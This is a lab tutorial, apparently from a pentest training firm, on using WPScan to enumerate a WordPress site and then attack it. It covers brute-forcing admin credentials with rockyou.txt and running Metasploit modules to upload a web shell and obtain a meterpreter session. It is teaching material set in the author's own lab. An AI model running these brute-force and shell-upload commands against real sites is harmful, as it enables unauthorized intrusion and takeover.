WPScan: WordPress Pentes�ng Framework
1|Page
� WPScan: WordPress Pentesting Framework
Contents
Introduc�on ............................................................................................................................................ 3
Introduc�on to WPScan .......................................................................................................................... 3
Let’s check out the major things that WPScan can do for us:......................................................... 3
Enumera�ng the WordPress web applica�on......................................................................................... 3
Scanning the WordPress version of the target’s website.................................................................... 4
Enumera�ng WordPress Themes ........................................................................................................ 6
Enumera�ng WordPress Plugins ......................................................................................................... 8
Enumera�ng WordPress Usernames ................................................................................................ 10
Enumerate ALL with a single command ............................................................................................ 10
WordPress Exploita�on ......................................................................................................................... 11
Brute-force atack using WPScan ...................................................................................................... 11
Shell Upload using Metasploit .......................................................................................................... 12
Vulnerable Plugin Exploita�on .......................................................................................................... 13
Scanning over a Proxy Server ................................................................................................................ 14
Scanning with an HTTP Authen�ca�on enabled ................................................................................... 15
2|Page
� WPScan: WordPress Pentesting Framework
Introduction
Almost every other web applica�on on the internet is running on a Content Management System,
o�en using WordPress, Squarespace, Joomla, or another pla�orm during its development phase. So
is your website one of them? In this ar�cle, we’ll atempt to compromise such WordPress websites
using one of the most powerful WordPress vulnerability scanners, namely WPScan.
Introduction to WPScan
“WordPress is one of the most powerful CMS platform, which covers about 35% of the total share of
the websites over the internet”. Thus, in order to enumerate such web applica�ons, we’ll be using
“WPScan” - which is a black box vulnerability scanner for WordPress, scripted in Ruby to focus on
different vulnerabili�es that are present in the WordPress applica�ons, either in its themes or
plugins.
Well, WPScan comes preinstalled in Kali Linux, SamuraiWTF, Pentoo, BlackArch; which scans up its
database in order to find out the outdated versions and the vulnerabili�es in the target’s web
applica�on.
Let’s check out the major things that WPScan can do for us:
• Detect the version of currently installed WordPress.
• Can detect sensi�ve files like readme, robots.txt, database replacing files, etc.
• Detect enabled features on currently installed WordPress server such as file_upload.
• Enumerates the themes, plugins along with their versions and tells if they are outdated or
not.
• It even scans up the web-applica�on to list out the available usernames.
Before going deeper, I suggest you check out our previous ar�cle where we’ve discussed the
“Mul�ple ways to setup a WordPress Penetra�on Tes�ng Lab”.
Let’s start!!
Enumerating the WordPress web application
As discussed earlier, WPScan is installed by default in the Kali Linux machines, so let’s check out the
default usage op�ons, by simply firing the following command in the terminal.
wpscan -hh
3|Page
� WPScan: WordPress Pentesting Framework
Scanning the WordPress version of the target’s website
As we were presented with the default op�ons, let’s now try to do a basic scan over the vulnerable
WordPress web-applica�on that we’ve set up in our earlier ar�cle.
4|Page
� WPScan: WordPress Pentesting Framework
Type the following command to scan the WordPress applica�on and its server.
wpscan --url http://192.168.1.105/wordpress/
From the below image you can see that it dumps up everything it could – the WordPress version, the
Apache server, and even it also found that the upload directory has directory lis�ng enables which
means anyone can browse to “/wp-content/uploads” in order to check out the uploaded files and
contents.
5|Page
� WPScan: WordPress Pentesting Framework
Enumerating WordPress Themes
Themes play an important role in any CMS web-applica�on, they control the general look & feel of
the website including its page layout, widget loca�ons, and the default font and colour preferences.
WPScan uses its database which contains about 2600 themes to check the vulnerable installed one
over the targets.
In order to check the installed themes of the target’s WordPress web-applica�on, type following
command:
6|Page
� WPScan: WordPress Pentesting Framework
wpscan --url http://192.168.1.105/wordpresws/ -e at
The “–e” flag is used for enumera�on and the “at” flag returns “all themes”.
You can even use the other flags such as “vt”, to list only the vulnerable themes.
Thus, running the above command, we will be presented with the installed themes with its version.
7|Page
� WPScan: WordPress Pentesting Framework
Enumerating WordPress Plugins
Plugins are the small piece of codes, that when added to a WordPress web-applica�on, boost up the
func�onali�es, and enhance the website’s features.
But these plugins may some�mes cause great damage to the web-applica�on due to their loosely
writen codes.
Lets’s check out the installed plugins on our target’s web-applica�on by execu�ng the below
command:
wpscan --url http://192.168.1.105/wordpress/ -e ap
Similar to the themes, we can also check the vulnerable plugins by using the “-vp” flag.
8|Page
� WPScan: WordPress Pentesting Framework
A�er wai�ng for a few seconds, WPScan will dump our desired result. From the below image, you
can see the plugins “mail-masta” and “reflex-gallery” are installed over our target’s website. As a
bonus, we even get the last update and the latest version.
9|Page
� WPScan: WordPress Pentesting Framework
Enumerating WordPress Usernames
To list out the usernames of our target website’s privileged users, execute the following command:
wpscan –url http://192.168.1.105/wordpress/ -e u
The flag “u” will grab all the usernames and will present a list on our screen.
As WPScan completes its work, we’ll find a list of all the users with their user IDs, in accordance with
how it grabbed them.
Enumerate ALL with a single command
Does WPScan give us that privilege to scan up the web-applica�ons to check everything in one go,
whether it is its version, the installed themes, or the plugins?
Let’s check this out!
Fire up the following command to grab everything we scanned above for our target web-applica�on.
10 | P a g e
� WPScan: WordPress Pentesting Framework
wpscan --url http://192.168.1.105/wordpress/ -e at –e ap –e u
• –e: at: enumerate all themes of targeted website
• –e: ap: enumerate all plugins of targeted website
• –e: u: enumerate all usernames of targeted website
WordPress Exploitation
Brute-force attack using WPScan
With the help of usernames which we enumerated earlier, we can create a word list of all the users
and can try a brute-force login atack using the default password list as “rockyou.txt”. You can learn
more about cracking the WordPress logins from here.
From the below image you can see our designed wordlist.
Let’s now try to exploit the website by defacing its login creden�als using the following command:
wpscan --url http://192.168.1.105/wordpress/ -U user.txt -P /usr/share/wordlists/rockyou.txt
The –U and the –P flags are used to set up the username list and the password list respec�vely.
11 | P a g e
� WPScan: WordPress Pentesting Framework
It will start matching the valid combina�on of username and password and then dumps the result,
from the given image you can see we found the login creden�als.
Great!! We got the admin creden�als as “admin: jessica”. Let’s try to get into the applica�on’s
dashboard with them.
Shell Upload using Metasploit
Isn’t it great if you get the target’s shell?
Run the following commands in order to get a meterpreter session of our target’s web-applica�on.
12 | P a g e
� WPScan: WordPress Pentesting Framework
msf > use exploit/unix/webapp/wp_admin_shell_upload
msf exploit(wp_admin_shell_upload) > set rhosts 192.168.1.105
msf exploit(wp_admin_shell_upload) > set username admin
msf exploit(wp_admin_shell_upload) > set password jessica
msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
msf exploit(wp_admin_shell_upload) > exploit
This module takes an administrator username and password, logs into the admin panel, and uploads
a payload packaged as a WordPress plugin. And finally, give us the meterpreter session of the
webserver.
Vulnerable Plugin Exploitation
Here in our website, we found a vulnerable plugin i.e. “slideshowgallery” which contains an
authen�cated file upload vulnerability thus in order to exploit it, we will be using the following
module which will offer us a reverse shell.
use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery _upload) > set rhost 192.168.1.105
msf exploit(wp_ slideshowgallery _upload) > set targeturi /wordpress
msf exploit(wp_ slideshowgallery _upload) > set username admin
msf exploit(wp_ slideshowgallery _upload) > set password jessica
msf exploit(wp_ slideshowgallery _upload) > exploit
From the below image you can see that we’ve successfully captured our target’s meterpreter session.
13 | P a g e
� WPScan: WordPress Pentesting Framework
Scanning over a Proxy Server
Is it possible to scan a WordPress web-applica�on running over a proxy server?
Many web-applica�ons use Proxy servers in order to be secure, but WPScan gives us this advantage
to scan such web-applica�ons using the “--proxy” flag.
Let’s check it out how:
Our WordPress web-applica�on is now running over a proxy server with a “port number as 3128”.
You can learn more about how to set up a proxy server from here.
Now if we try to scan it with the default usage op�on, we’ll get an error and our scan will halt. So,
let’s try to use the proxy port in order to scan the web-applica�on.
14 | P a g e
� WPScan: WordPress Pentesting Framework
Simply run the following command to bypass this proxy server:
wpscan --url http://192.168.1.105/wordpress/ --proxy http://192.168.1.105:3128
From the below image you can see that we are back into the scanning sec�on.
Scanning with an HTTP Authentication enabled
Many websites enable HTTP authen�ca�on so that they can hide some essen�al and cri�cal
informa�on from unauthen�cated users.
We have also set a similar valida�on over our website with the creden�als as “raj : 123”. To learn
more about HTTP authen�ca�on click here.
15 | P a g e
� WPScan: WordPress Pentesting Framework
From the below image you can see that when we tried the normal scan, we got an alert as “Please
provide it with --htp-auth”.
Thus, following this alert, we’ve used the --htp-auth and had entered our creden�als.
wpscan --url http://192.168.1.105/wordpress/ --http-auth raj:123
And there we go, our scan has been started now.
16 | P a g e
� JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER
Bug Bounty Network Security
Ethical Hacking Essentials
Network Pentest
Wireless Pentest
ADVANCED
Burp Suite Pro Web Pro Computer
Services-API Infrastructure VAPT Forensics
Advanced CTF
Android Pentest Metasploit
EXPERT
Red Team Operation
Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment
www.ignitetechnologies.in
